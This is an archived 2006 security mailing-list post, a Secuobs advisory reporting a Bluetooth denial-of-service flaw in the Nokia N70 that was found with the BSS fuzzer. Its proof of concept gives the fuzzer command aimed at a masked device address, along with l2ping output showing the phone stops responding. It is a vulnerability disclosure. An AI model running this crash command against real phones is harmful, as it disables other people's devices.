lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <43ED10ED.90005@infratech.fr>
Date: Fri Feb 10 22:17:29 2006
From: research at infratech.fr (Infratech Research)
Subject: [ Secuobs - Advisory ] Bluetooth : DoS on Nokia
	cell phones

[Software affected] Bluetooth Stack on Nokia cell phones

[Version] Nokia N70 and maybe other models

[Impact] Denial of Service on Bluetooth Stack (maybe more) - Message "System Error" - Phone DoS (shutdown)

[Credits] Pierre Betouin - pierre.betouin@...ratech.fr -  Bug found with BSS v0.6 GPL fuzzer (Bluetooh Stack Smasher - Linux) 

BSS could be downloaded on  http://www.secuobs.com/news/05022006-bluetooth10.shtml

[Vendor] notified now

[Original advisory]

http://www.secuobs.com/news/10022006-nokia_n70.shtml#english
http://www.secuobs.com/news/10022006-nokia_n70.shtml#french

[Proof of Concept]

# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss

# ./bss -m 12 -s 1000 00:15:A0:XX:XX:XX
(... snip ...)

# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:80:37:ZZ:ZZ:ZZ id 0
1 sent, 0 received, 100% loss

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ